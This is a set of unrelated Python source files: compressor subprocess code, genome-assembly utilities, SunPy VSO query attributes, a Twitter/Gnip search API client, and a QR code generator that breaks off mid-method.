pipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, stderr=subprocess.PIPE)
if content:
content = smart_bytes(content)
stdout, stderr = pipe.communicate(content)
if stderr.strip():
raise CompressorError(stderr)
if self.verbose:
print(stderr)
return stdout
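# A minimal sketch of a concrete compressor built on SubProcessCompressor
# (the 'mytool' binary is hypothetical; the shipped compressors wire up
# compress_js/compress_css to execute_command in the same way):
#
#     class MyToolCompressor(SubProcessCompressor):
#         def compress_js(self, js):
#             return self.execute_command('mytool --type js', js)
#         def compress_css(self, css):
#             return self.execute_command('mytool --type css', css)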
|
|
#! /usr/bin/env python
"""Assembly execution drivers.
This module provides the default parameters and handling of
assembler-specific configurations.
Assembler defaults are set in the 'arast.conf' file
"""
import logging
import os
import re
import subprocess
import shutil
import glob
import metadata as meta
from ConfigParser import SafeConfigParser
# Module-level parser for 'arast.conf' (see module docstring); assumed to be
# readable from the working directory so get_default() works without setup.
parser = SafeConfigParser()
parser.read('arast.conf')
def get_default(key):
    """Get assemblers default value from config file."""
    return parser.get('assemblers', key)
def run(pmanager, assembler, job_data):
    """Run ASSEMBLER on JOB_DATA via a Yapsy-style plugin manager.
    NOTE: the original referenced self.pmanager, which does not exist in a
    module-level function, so the manager is taken as an argument here."""
    plugin = pmanager.getPluginByName(assembler)
    settings = plugin.details.items('Settings')
    return plugin.plugin_object(settings, job_data)
def get_tar_name(job_id, suffix):
name = 'job' + str(job_id)
name += '_'
name += suffix
name += '.tar.gz'
return name
def tar(outpath, asm_data, tarname):
print "Compressing"
outfile = outpath + '/tar/'
try:
os.makedirs(outfile)
    except OSError:  # directory already exists
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, asm_data]
t = subprocess.Popen(targs)
t.wait()
return outfile
def tar_directory(outpath, directory, tarname):
outfile = outpath
try:
os.makedirs(outfile)
    except OSError:  # directory already exists
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, './']
t = subprocess.Popen(targs, cwd=directory)
t.wait()
return outfile
def tar_list(outpath, file_list, tarname):
""" Tars a file list. Attempts to find the highest common path"""
common_path = os.path.commonprefix(file_list)
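    # NB: os.path.commonprefix() is character-based rather than path-aware,
    # so it may return a partial path component; everything below is made
    # relative to whatever it yields.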
outfile = outpath + '/tar/'
    try:
        os.makedirs(outfile)
    except OSError:  # directory already exists
        pass
outfile += tarname
targs = ['tar', '-czvf', outfile]
targs += [os.path.relpath(path, common_path) for path in file_list]
logging.debug("Tar command: %s: " % targs)
t = subprocess.Popen(targs, cwd=common_path)
t.wait()
return outfile
def ls_recursive(path):
""" Returns list of all files in a dir"""
allfiles = []
for root, sub_dirs, files in os.walk(path):
for f in files:
allfiles.append(os.path.join(root, f))
return allfiles
def prefix_file_move(file, prefix):
""" Adds prefix to file, returns new file name, moves file"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
os.rename(file, newfile)
return newfile
def prefix_file(file, prefix):
""" Adds prefix to file, returns new filename"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
return newfile
def rename_file_copy(filepath, newname):
""" Renames the file, keeping the file extension, copies to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
shutil.copy(filepath, newfile)
return newfile
def rename_file_symlink(filepath, newname):
""" Renames the file, keeping the file extension, symlinks to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
os.symlink(filepath, newfile)
return newfile
def get_fasta(directory):
""" Return the list of Fasta files in DIRECTORY
"""
files = os.listdir(directory)
fasta_files = [file for file in files
if re.search(r'\.fa$|\.fasta$', file, re.IGNORECASE) is not None]
return fasta_files
def get_fastq(directory):
""" Return the list of Fastq files in DIRECTORY
"""
files = os.listdir(directory)
fastq_files = [file for file in files
if re.search(r'\.fq$|\.fastq$', file, re.IGNORECASE) is not None]
return fastq_files
def get_quala(directory):
""" Return the list of Quala files in DIRECTORY
"""
files = os.listdir(directory)
quala_files = [file for file in files
if re.search(r'\.qa$|\.quala$', file, re.IGNORECASE) is not None]
    return quala_files
def read_config():
pass
def run_bwa(data_dir, ref_name, read_files, prefix):
""" Ex: run_bwa(velvet_data, 'contigs.fa', reads_list, 'velvet') """
bwa_exec = 'bwa'
samtools_exec = 'samtools'
tmp_files = []
ref_file = data_dir + ref_name
# Run the index on reference
bwa_args = [bwa_exec, 'index']
bwa_args.append(ref_file)
logging.info(bwa_args)
p_index = subprocess.Popen(bwa_args)
p_index.wait()
# Align reads to reference
bwa_args = [bwa_exec, 'aln']
bwa_args.append(ref_file)
if len(read_files) > 1:
# Concatenate read files
reads = data_dir + 'reads.fa'
destination = open(reads,'wb')
for rf in read_files:
logging.info("Concatenating read file: %s", rf)
shutil.copyfileobj(open(rf,'rb'), destination)
destination.close()
tmp_files.append(reads)
else:
reads = read_files[0]
bwa_args.append(reads)
aln_out = data_dir + prefix
aln_out += '_aln.sai'
aln_outbuffer = open(aln_out, 'wb')
tmp_files.append(aln_out)
bwa_args.append(aln_out)
logging.info(bwa_args)
p_aln = subprocess.Popen(bwa_args, stdout=aln_outbuffer)
p_aln.wait()
aln_outbuffer.close()
# Create Sam file
#bwa samse $ref $dir/aln-$refX$reads.sai $reads > $dir/aln-$refX$reads.sam
bwa_args = [bwa_exec, 'samse', ref_file, aln_out, reads]
sam_out = data_dir + prefix
sam_out += '_aln.sam'
sam_outbuffer = open(sam_out, 'wb')
tmp_files.append(sam_out)
bwa_args.append(sam_out)
logging.info(bwa_args)
p_sam = subprocess.Popen(bwa_args, stdout=sam_outbuffer)
p_sam.wait()
sam_outbuffer.close()
# Create bam file
# samtools view -S -b -o $dir/aln-$refX$reads.bam $dir/aln-$refX$reads.sam
samtools_args = [samtools_exec, 'view', '-S', '-b', '-o']
bam_out = data_dir + prefix
bam_out += '_aln.bam'
bam_outbuffer = open(bam_out, 'wb')
samtools_args.append(bam_out)
samtools_args.append(sam_out)
logging.info(samtools_args)
p_bam = subprocess.Popen(samtools_args, stdout=bam_outbuffer)
p_bam.wait()
bam_outbuffer.close()
for temp in tmp_files:
        try:
            os.remove(temp)
        except OSError:
            logging.info("Could not remove %s" % temp)
return bam_out
def get_qual_encoding(file):
    f = open(file, 'r')
    while True:
        bline = f.readline()
        if len(bline) == 0:  # EOF
            break
        if bline.find('+') != -1:  # Line before quality line
            line = f.readline()
            for c in line:
                # phred33 quality characters top out at ASCII 74 ('J') and
                # phred64 characters start at ASCII 64 ('@'), so values
                # outside those bounds identify the encoding.
                if ord(c) > 74:
                    logging.info("Detected phred64 quality encoding")
                    f.close()
                    return 'phred64'
                elif ord(c) < 64:
                    logging.info("Detected phred33 quality encoding")
                    f.close()
                    return 'phred33'
    f.close()
    return
def tab_to_fasta(tabbed_file, outfile, threshold):
tabbed = open(tabbed_file, 'r')
fasta = open(outfile, 'w')
#prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', '\n']
prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', ' seed_', '\n']
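    # Each tab-separated column is written behind its matching prefix, so a
    # row becomes a header like '>_<id> len_<n> cov_<c> stdev_<s> GC_<g> seed_<x>'
    # with the final column (the sequence) emitted on its own line via the
    # trailing '\n' prefix.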
for line in tabbed:
l = line.split('\t')
if int(l[1]) <= threshold:
for i in range(len(l)):
fasta.write(prefixes[i] + l[i])
tabbed.close()
fasta.close()
def arast_reads(filelist):
""" Returns a list of files into the ARAST reads dict format """
filedicts = []
for f in filelist:
filedicts.append({'type':'single', 'files':[f]})
return filedicts
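# For example, arast_reads(['a.fq', 'b.fq']) returns:
#   [{'type': 'single', 'files': ['a.fq']},
#    {'type': 'single', 'files': ['b.fq']}]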
parser = SafeConfigParser()
#parser.read('arast.conf')
#basepath = get_default('basepath')
#metadata = meta.MetadataConnection(parser.get('meta','mongo.remote.host'))
|
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#
# This module was developed with funding provided by
# the ESA Summer of Code (2011).
#
# pylint: disable=C0103,R0903
"""
Attributes that can be used to construct VSO queries. Attributes are the
fundamental building blocks of queries that, together with the two
operations of AND and OR (and in some rare cases XOR) can be used to
construct complex queries. Most attributes can only be used once in an
AND-expression; attempting to use one twice is called a collision. For
a quick example, think about how the system should handle
Instrument('aia') & Instrument('eit').
"""
from __future__ import absolute_import
from datetime import datetime
from sunpy.net.attr import (
    Attr, ValueAttr, AttrWalker, AttrAnd, AttrOr, DummyAttr
)
from sunpy.util.util import to_angstrom
from sunpy.util.multimethod import MultiMethod
from sunpy.time import parse_time
TIMEFORMAT = '%Y%m%d%H%M%S'
class _Range(object):
def __init__(self, min_, max_, create):
self.min = min_
self.max = max_
self.create = create
def __xor__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
new = DummyAttr()
if self.min < other.min:
new |= self.create(self.min, min(other.min, self.max))
if other.max < self.max:
new |= self.create(other.max, self.max)
return new
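    # e.g. [0, 10] ^ [5, 20] yields the uncovered part [0, 5]; when the
    # other range sits strictly inside this one, both branches contribute.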
def __contains__(self, other):
return self.min <= other.min and self.max >= other.max
class Wave(Attr, _Range):
def __init__(self, wavemin, wavemax, waveunit='Angstrom'):
self.min, self.max = sorted(
to_angstrom(v, waveunit) for v in [wavemin, wavemax]
)
self.unit = 'Angstrom'
Attr.__init__(self)
_Range.__init__(self, self.min, self.max, self.__class__)
def collides(self, other):
return isinstance(other, self.__class__)
class Time(Attr, _Range):
def __init__(self, start, end, near=None):
self.start = parse_time(start)
self.end = parse_time(end)
self.near = None if near is None else parse_time(near)
_Range.__init__(self, self.start, self.end, self.__class__)
Attr.__init__(self)
def collides(self, other):
return isinstance(other, self.__class__)
def __xor__(self, other):
if not isinstance(other, self.__class__):
raise TypeError
if self.near is not None or other.near is not None:
raise TypeError
return _Range.__xor__(self, other)
def pad(self, timedelta):
return Time(self.start - timedelta, self.start + timedelta)
def __repr__(self):
return '<Time(%r, %r, %r)>' % (self.start, self.end, self.near)
class Extent(Attr):
# pylint: disable=R0913
def __init__(self, x, y, width, length, type_):
Attr.__init__(self)
self.x = x
self.y = y
self.width = width
self.length = length
self.type = type_
def collides(self, other):
return isinstance(other, self.__class__)
class Field(ValueAttr):
def __init__(self, fielditem):
ValueAttr.__init__(self, {
('field', 'fielditem'): fielditem
})
class _VSOSimpleAttr(Attr):
""" A _SimpleAttr is an attribute that is not composite, i.e. that only
has a single value, such as, e.g., Instrument('eit'). """
def __init__(self, value):
Attr.__init__(self)
self.value = value
def collides(self, other):
return isinstance(other, self.__class__)
def __repr__(self):
return "<%s(%r)>" % (self.__class__.__name__, self.value)
class Provider(_VSOSimpleAttr):
pass
class Source(_VSOSimpleAttr):
pass
class Instrument(_VSOSimpleAttr):
pass
class Physobs(_VSOSimpleAttr):
pass
class Pixels(_VSOSimpleAttr):
pass
class Level(_VSOSimpleAttr):
pass
class Resolution(_VSOSimpleAttr):
pass
class Detector(_VSOSimpleAttr):
pass
class Filter(_VSOSimpleAttr):
pass
class Sample(_VSOSimpleAttr):
pass
class Quicklook(_VSOSimpleAttr):
pass
class PScale(_VSOSimpleAttr):
pass
# The walker specifies how the Attr-tree is converted to a query the
# server can handle.
walker = AttrWalker()
# The _create functions make a new VSO query from the attribute tree,
# the _apply functions take an existing query-block and update it according
# to the attribute tree passed in as root. Different attributes require
# different functions for conversion into query blocks.
@walker.add_creator(ValueAttr, AttrAnd)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
value = api.factory.create('QueryRequestBlock')
wlk.apply(root, api, value)
return [value]
@walker.add_applier(ValueAttr)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
for k, v in root.attrs.iteritems():
lst = k[-1]
rest = k[:-1]
block = queryblock
for elem in rest:
block = block[elem]
block[lst] = v
@walker.add_applier(AttrAnd)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
for attr in root.attrs:
wlk.apply(attr, api, queryblock)
@walker.add_creator(AttrOr)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
blocks = []
for attr in root.attrs:
blocks.extend(wlk.create(attr, api))
return blocks
@walker.add_creator(DummyAttr)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
return api.factory.create('QueryRequestBlock')
@walker.add_applier(DummyAttr)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
pass
# Converters take a type unknown to the walker and convert it into one
# known to it. All of those convert types into ValueAttrs, which are
# handled above by just assigning according to the keys and values of the
# attrs member.
walker.add_converter(Extent)(
lambda x: ValueAttr(
dict((('extent', k), v) for k, v in vars(x).iteritems())
)
)
walker.add_converter(Time)(
lambda x: ValueAttr({
('time', 'start'): x.start.strftime(TIMEFORMAT),
('time', 'end'): x.end.strftime(TIMEFORMAT) ,
('time', 'near'): (
x.near.strftime(TIMEFORMAT) if x.near is not None else None),
})
)
walker.add_converter(_VSOSimpleAttr)(
lambda x: ValueAttr({(x.__class__.__name__.lower(), ): x.value})
)
walker.add_converter(Wave)(
lambda x: ValueAttr({
('wave', 'wavemin'): x.min,
('wave', 'wavemax'): x.max,
('wave', 'waveunit'): x.unit,
})
)
# The idea of using a multi-method here - that means a method which dispatches
# by type but is not attached to said class - is that the attribute classes are
# designed to be used not only in the context of VSO but also elsewhere (which
# AttrAnd and AttrOr obviously are - in the HEK module). If we defined the
# filter method as a member of the attribute classes, we could only filter
# one type of data (that is, VSO data).
filter_results = MultiMethod(lambda *a, **kw: (a[0], ))
# If we filter with ANDed-together attributes, the only items left are the
# ones that match all of them - this is implemented by ANDing the pool of
# items with the matched items - only the ones that match everything
# remain afterwards.
@filter_results.add_dec(AttrAnd)
def _(attr, results):
res = set(results)
for elem in attr.attrs:
res &= filter_results(elem, res)
return res
# If we filter with ORed attributes, the only items that should be
# removed are the ones that match none of them. That's why we build up
# the resulting set by ORing all the matching items.
@filter_results.add_dec(AttrOr)
def _(attr, results):
res = set()
for elem in attr.attrs:
res |= filter_results(elem, results)
return res
# Filter out items by comparing attributes.
@filter_results.add_dec(_VSOSimpleAttr)
def _(attr, results):
attrname = attr.__class__.__name__.lower()
return set(
item for item in results
        # Some servers seem to omit some fields. No way to filter there.
if not hasattr(item, attrname) or
getattr(item, attrname).lower() == attr.value.lower()
)
# The dummy attribute does not filter at all.
@filter_results.add_dec(DummyAttr, Field)
def _(attr, results):
return set(results)
@filter_results.add_dec(Wave)
def _(attr, results):
return set(
it for it in results
if
attr.min <= to_angstrom(it.wave.wavemax, it.wave.waveunit)
and
attr.max >= to_angstrom(it.wave.wavemin, it.wave.waveunit)
)
@filter_results.add_dec(Time)
def _(attr, results):
return set(
it for it in results
if
attr.min <= datetime.strptime(it.time.end, TIMEFORMAT)
and
attr.max >= datetime.strptime(it.time.start, TIMEFORMAT)
)
@filter_results.add_dec(Extent)
def _(attr, results):
return set(
it for it in results
if it.extent.type.lower() == attr.type.lower()
)
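# A minimal usage sketch (assuming a working sunpy install): attributes
# compose with & and |, and filter_results dispatches on attribute type.
if __name__ == '__main__':
    attr = Instrument('eit') & Time('2011-01-01', '2011-01-02')
    # An empty result pool trivially filters to an empty set.
    print(filter_results(attr, []))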
|
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__="Scott Hendrickson, Josh Montague"
import sys
import requests
import json
import codecs
import datetime
import time
import os
import re
import unicodedata
from acscsv.twitter_acs import TwacsCSV
## update for python3
if sys.version_info[0] == 2:
reload(sys)
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
sys.stdin = codecs.getreader('utf-8')(sys.stdin)
#remove this
requests.packages.urllib3.disable_warnings()
# formatter of data from API
TIME_FORMAT_SHORT = "%Y%m%d%H%M"
TIME_FORMAT_LONG = "%Y-%m-%dT%H:%M:%S.000Z"
PAUSE = 1 # seconds between page requests
POSTED_TIME_IDX = 1
#date time parsing utility regex
DATE_TIME_RE = re.compile("([0-9]{4}).([0-9]{2}).([0-9]{2}).([0-9]{2}):([0-9]{2})")
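# e.g. "2015-01-31 12:30" matches; the five captured groups concatenate
# to the compact form "201501311230" expected by TIME_FORMAT_SHORT.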
class Query(object):
"""Object represents a single search API query and provides utilities for
managing parameters, executing the query and parsing the results."""
def __init__(self
, user
, password
, stream_url
, paged = False
, output_file_path = None
, hard_max = None
):
"""A Query requires at least a valid user name, password and endpoint url.
The URL of the endpoint should be the JSON records endpoint, not the counts
endpoint.
Additional parameters specifying paged search and an output file path
allow for queries which return more than the 500-activity limit imposed
by a single call to the API. This is called paging or paged search.
Setting paged = True enables the token-interpretation functionality
provided by the API to return a seamless set of activities.
Once the object is created, it can be used for repeated access to the
configured end point with the same connection configuration set at
creation."""
self.output_file_path = output_file_path
self.paged = paged
self.hard_max = hard_max
self.paged_file_list = []
self.user = user
self.password = password
self.end_point = stream_url # activities end point NOT the counts end point
# get a parser for the twitter columns
        # TODO: use the updated retrieval methods in gnacs instead of this?
self.twitter_parser = TwacsCSV(",", None, False, True, False, True, False, False, False)
# Flag for post processing tweet timeline from tweet times
self.tweet_times_flag = False
def set_dates(self, start, end):
"""Utility function to set dates from strings. Given string-formated
dates for start date time and end date time, extract the required
date string format for use in the API query and make sure they
are valid dates.
Sets class fromDate and toDate date strings."""
if start:
dt = re.search(DATE_TIME_RE, start)
if not dt:
raise ValueError("Error. Invalid start-date format: %s \n"%str(start))
else:
f =''
                for i in range(DATE_TIME_RE.groups):
f += dt.group(i+1)
self.fromDate = f
# make sure this is a valid date
tmp_start = datetime.datetime.strptime(f, TIME_FORMAT_SHORT)
if end:
dt = re.search(DATE_TIME_RE, end)
if not dt:
raise ValueError("Error. Invalid end-date format: %s \n"%str(end))
else:
e =''
                for i in range(DATE_TIME_RE.groups):
e += dt.group(i+1)
self.toDate = e
# make sure this is a valid date
tmp_end = datetime.datetime.strptime(e, TIME_FORMAT_SHORT)
if start:
if tmp_start >= tmp_end:
raise ValueError("Error. Start date greater than end date.\n")
def name_munger(self, f):
"""Utility function to create a valid, friendly file name base
string from an input rule."""
f = re.sub(' +','_',f)
f = f.replace(':','_')
f = f.replace('"','_Q_')
f = f.replace('(','_p_')
f = f.replace(')','_p_')
self.file_name_prefix = unicodedata.normalize(
"NFKD",f[:42]).encode(
"ascii","ignore")
def request(self):
"""HTTP request based on class variables for rule_payload,
stream_url, user and password"""
try:
s = requests.Session()
s.headers = {'Accept-encoding': 'gzip'}
s.auth = (self.user, self.password)
res = s.post(self.stream_url, data=json.dumps(self.rule_payload))
if res.status_code != 200:
sys.stderr.write("Exiting with HTTP error code {}\n".format(res.status_code))
sys.stderr.write("ERROR Message: {}\n".format(res.json()["error"]["message"]))
                if True:  # TODO: gate on self.return_incomplete
                    sys.stderr.write("Returning incomplete dataset.\n")
return(res.content.decode(res.encoding))
sys.exit(-1)
except requests.exceptions.ConnectionError as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
except requests.exceptions.HTTPError as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
except requests.exceptions.MissingSchema as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
#Don't use res.text as it creates encoding challenges!
return(res.content.decode(res.encoding))
def parse_responses(self, count_bucket):
"""Parse returned responses.
When paged=True, manage paging using the API token mechanism
When output file is set, write output files for paged output."""
acs = []
repeat = True
page_count = 1
self.paged_file_list = []
while repeat:
doc = self.request()
tmp_response = json.loads(doc)
if "results" in tmp_response:
acs.extend(tmp_response["results"])
else:
raise ValueError("Invalid request\nQuery: %s\nResponse: %s"%(self.rule_payload, doc))
if self.hard_max is None or len(acs) < self.hard_max:
repeat = False
if self.paged or count_bucket:
if len(acs) > 0:
if self.output_file_path is not None:
# writing to file
file_name = self.output_file_path + "/{0}_{1}.json".format(
str(datetime.datetime.utcnow().strftime(
"%Y%m%d%H%M%S"))
, str(self.file_name_prefix))
with codecs.open(file_name, "wb","utf-8") as out:
for item in tmp_response["results"]:
out.write(json.dumps(item)+"\n")
self.paged_file_list.append(file_name)
# if writing to file, don't keep track of all the data in memory
acs = []
else:
# storing in memory, so give some feedback as to size
sys.stderr.write("[{0:8d} bytes] {1:5d} total activities retrieved...\n".format(
sys.getsizeof(acs)
, len(acs)))
else:
sys.stderr.write( "No results returned for rule:{0}\n".format(str(self.rule_payload)) )
if "next" in tmp_response:
self.rule_payload["next"]=tmp_response["next"]
repeat = True
page_count += 1
sys.stderr.write( "Fetching page {}...\n".format(page_count) )
else:
if "next" in self.rule_payload:
del self.rule_payload["next"]
repeat = False
time.sleep(PAUSE)
else:
# stop iterating after reaching hard_max
repeat = False
return acs
def get_time_series(self):
if self.paged and self.output_file_path is not None:
for file_name in self.paged_file_list:
with codecs.open(file_name,"rb") as f:
for res in f:
rec = json.loads(res.decode('utf-8').strip())
t = datetime.datetime.strptime(rec["timePeriod"], TIME_FORMAT_SHORT)
yield [rec["timePeriod"], rec["count"], t]
else:
if self.tweet_times_flag:
# todo: list of tweets, aggregate by bucket
raise NotImplementedError("Aggregated buckets on json tweets not implemented!")
else:
for i in self.time_series:
yield i
def get_activity_set(self):
"""Generator iterates through the entire activity set from memory or disk."""
if self.paged and self.output_file_path is not None:
for file_name in self.paged_file_list:
with codecs.open(file_name,"rb") as f:
for res in f:
yield json.loads(res.decode('utf-8'))
else:
for res in self.rec_dict_list:
yield res
def get_list_set(self):
"""Like get_activity_set, but returns a list containing values parsed by
current Twacs parser configuration."""
for rec in self.get_activity_set():
yield self.twitter_parser.get_source_list(rec)
def execute(self
, pt_filter
, max_results = 100
, start = None
, end = None
, count_bucket = None # None is json
, show_query = False):
"""Execute a query with filter, maximum results, start and end dates.
Count_bucket determines the bucket size for the counts endpoint.
If the count_bucket variable is set to a valid bucket size such
as mintute, day or week, then the acitivity counts endpoint will
Otherwise, the data endpoint is used."""
# set class start and stop datetime variables
self.set_dates(start, end)
# make a friendlier file name from the rules
self.name_munger(pt_filter)
if self.paged or max_results > 500:
# avoid making many small requests
max_results = 500
self.rule_payload = {
'query': pt_filter
}
self.rule_payload["maxResults"] = int(max_results)
if start:
self.rule_payload["fromDate"] = self.fromDate
if end:
self.rule_payload["toDate"] = self.toDate
# use the proper endpoint url
self.stream_url = self.end_point
if count_bucket:
if not self.end_point.endswith("counts.json"):
self.stream_url = self.end_point[:-5] + "/counts.json"
if count_bucket not in ['day', 'minute', 'hour']:
raise ValueError("Error. Invalid count bucket: %s \n"%str(count_bucket))
self.rule_payload["bucket"] = count_bucket
self.rule_payload.pop("maxResults",None)
# for testing, show the query JSON and stop
if show_query:
sys.stderr.write("API query:\n")
sys.stderr.write(json.dumps(self.rule_payload) + '\n')
sys.exit()
# set up variable to catch the data in 3 formats
self.time_series = []
self.rec_dict_list = []
self.rec_list_list = []
self.res_cnt = 0
# timing
self.delta_t = 1 # keeps us from crashing
# actual oldest tweet before now
self.oldest_t = datetime.datetime.utcnow()
# actual newest tweet more recent that 30 days ago
# self.newest_t = datetime.datetime.utcnow() - datetime.timedelta(days=30)
# search v2: newest date is more recent than 2006-03-01T00:00:00
self.newest_t = datetime.datetime.strptime("2006-03-01T00:00:00.000z", TIME_FORMAT_LONG)
#
for rec in self.parse_responses(count_bucket):
# parse_responses returns only the last set of activities retrieved, not all paged results.
# to access the entire set, use the helper functions get_activity_set and get_list_set!
self.res_cnt += 1
self.rec_dict_list.append(rec)
if count_bucket:
# timeline data
t = datetime.datetime.strptime(rec["timePeriod"], TIME_FORMAT_SHORT)
tmp_tl_list = [rec["timePeriod"], rec["count"], t]
self.tweet_times_flag = False
else:
# json activities
# keep track of tweet times for time calculation
tmp_list = self.twitter_parser.procRecordToList(rec)
self.rec_list_list.append(tmp_list)
t = datetime.datetime.strptime(tmp_list[POSTED_TIME_IDX], TIME_FORMAT_LONG)
tmp_tl_list = [tmp_list[POSTED_TIME_IDX], 1, t]
self.tweet_times_flag = True
# this list is ***either*** list of buckets or list of tweet times!
self.time_series.append(tmp_tl_list)
# timeline requests don't return activities!
if t < self.oldest_t:
self.oldest_t = t
if t > self.newest_t:
self.newest_t = t
self.delta_t = (self.newest_t - self.oldest_t).total_seconds()/60.
return
def get_rate(self):
"""Returns rate from last query executed"""
if self.delta_t != 0:
return float(self.res_cnt)/self.delta_t
else:
return None
def __len__(self):
"""Returns the size of the results set when len(Query) is called."""
try:
return self.res_cnt
except AttributeError:
return 0
def __repr__(self):
"""Returns a string represenataion of the result set."""
try:
return "\n".join([json.dumps(x) for x in self.rec_dict_list])
except AttributeError:
return "No query completed."
if __name__ == "__main__":
g = Query("shendrickson@gnip.com"
, "XXXXXPASSWORDXXXXX"
, "https://gnip-api.twitter.com/search/30day/accounts/shendrickson/wayback.json")
g.execute("bieber", 10)
for x in g.get_activity_set():
print(x)
print(g)
print(g.get_rate())
g.execute("bieber", count_bucket = "hour")
print(g)
print(len(g))
pg = Query("shendrickson@gnip.com"
, "XXXXXPASSWORDXXXXX"
, "https://gnip-api.twitter.com/search/30day/accounts/shendrickson/wayback.json"
, paged = True
, output_file_path = "../data/")
now_date = datetime.datetime.now()
pg.execute("bieber"
, end=now_date.strftime(TIME_FORMAT_LONG)
, start=(now_date - datetime.timedelta(seconds=200)).strftime(TIME_FORMAT_LONG))
for x in pg.get_activity_set():
print(x)
g.execute("bieber", show_query=True)
|
|
#
# QR Code Generator for Python
#
# Copyright (c) 2012 Kazuhiko Arase
#
# URL: http://www.d-project.com/
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word 'QR Code' is a registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
#
"""QR Code Generator for Python
from qrcode import QRCode, ErrorCorrectLevel
# generate with explicit type number
qr = QRCode()
qr.setTypeNumber(4)
qr.setErrorCorrectLevel(ErrorCorrectLevel.M)
qr.addData('here comes qr!')
qr.make()
# generate with auto type number
# qr = QRCode.getMinimumQRCode('here comes qr!', ErrorCorrectLevel.M)
# create an image
for r in range(qr.getModuleCount() ):
for c in range(qr.getModuleCount() ):
color = black if qr.isDark(r, c) else white
# set pixel ...
"""
class QRCode:
PAD0 = 0xEC
PAD1 = 0x11
def __init__(self):
self.typeNumber = 1
self.errorCorrectLevel = ErrorCorrectLevel.H
self.qrDataList = []
self.modules = []
self.moduleCount = 0
def getTypeNumber(self):
return self.typeNumber
def setTypeNumber(self, typeNumber):
self.typeNumber = typeNumber
def getErrorCorrectLevel(self):
return self.errorCorrectLevel
def setErrorCorrectLevel(self, errorCorrectLevel):
self.errorCorrectLevel = errorCorrectLevel
def clearData(self):
self.qrDataList = []
def addData(self, data):
self.qrDataList.append(QR8BitByte(data) )
def getDataCount(self):
return len(self.qrDataList)
def getData(self, index):
return self.qrDataList[index]
def isDark(self, row, col):
return (self.modules[row][col] if self.modules[row][col] != None
else False)
def getModuleCount(self):
return self.moduleCount
def make(self):
self._make(False, self._getBestMaskPattern() )
def _getBestMaskPattern(self):
minLostPoint = 0
pattern = 0
for i in range(8):
self._make(True, i)
lostPoint = QRUtil.getLostPoint(self)
if i == 0 or minLostPoint > lostPoint:
minLostPoint = lostPoint
pattern = i
return pattern
def _make(self, test, maskPattern):
self.moduleCount = self.typeNumber * 4 + 17
self.modules = [[None] * self.moduleCount
for i in range(self.moduleCount)]
self._setupPositionProbePattern(0, 0)
self._setupPositionProbePattern(self.moduleCount - 7, 0)
self._setupPositionProbePattern(0, self.moduleCount - 7)
self._setupPositionAdjustPattern()
self._setupTimingPattern()
self._setupTypeInfo(test, maskPattern)
if self.typeNumber >= 7:
self._setupTypeNumber(test)
data = QRCode._createData(
self.typeNumber,
self.errorCorrectLevel,
self.qrDataList)
self._mapData(data, maskPattern)
def _mapData(self, data, maskPattern):
rows = list(range(self.moduleCount) )
cols = [col - 1 if col <= 6 else col
for col in range(self.moduleCount - 1, 0, -2)]
maskFunc = QRUtil.getMaskFunction(maskPattern)
byteIndex = 0
bitIndex = 7
for col in cols:
rows.reverse()
for row in rows:
for c in range(2):
if self.modules[row][col - c] == None:
dark = False
if byteIndex < len(data):
dark = ( (data[byteIndex] >> bitIndex) & 1) == 1
if maskFunc(row, col - c):
dark = not dark
self.modules[row][col - c] = dark
bitIndex -= 1
if bitIndex == -1:
byteIndex += 1
bitIndex = 7
def _setupPositionAdjustPattern(self):
pos = QRUtil.getPatternPosition(self.typeNumber)
for row in pos:
for col in pos:
if self.modules[row][col] != None:
continue
for r in range(-2, 3):
for c in range(-2, 3):
self.modules[row + r][col + c] = (
r == -2 or r == 2 or c == -2 or c == 2
or (r == 0 and c == 0) )
def _setupPositionProbePattern(self, row, col):
for r in range(-1, 8):
for c in range(-1, 8):
if (row + r <= -1 or self.moduleCount <= row + r
or col + c <= -1 or self.moduleCount <= col + c):
continue
self.modules[row + r][col + c] = (
(0 <= r and r <= 6 and (c == 0 or c == 6) )
or (0 <= c and c <= 6 and (r == 0 or r == 6) )
or (2 <= r and r <= 4 and 2 <= c and c <= 4) )
def _setupTimingPattern(self):
for r in range(8, self.moduleCount - 8):
if self.modules[r][6] != None:
continue
self.modules[r][6] = r % 2 == 0
for c in range(8, self.moduleCount - 8):
if self.modules[6][c] != None:
continue
self.modules[6][c] = c % 2 == 0
def _setupTypeNumber(self, test):
bits = QRUtil.getBCHTypeNumber(self.typeNumber)
for i in range(18):
self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = (
not test and ( (bits >> i) & 1) == 1)
for i in range(18):
self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = (
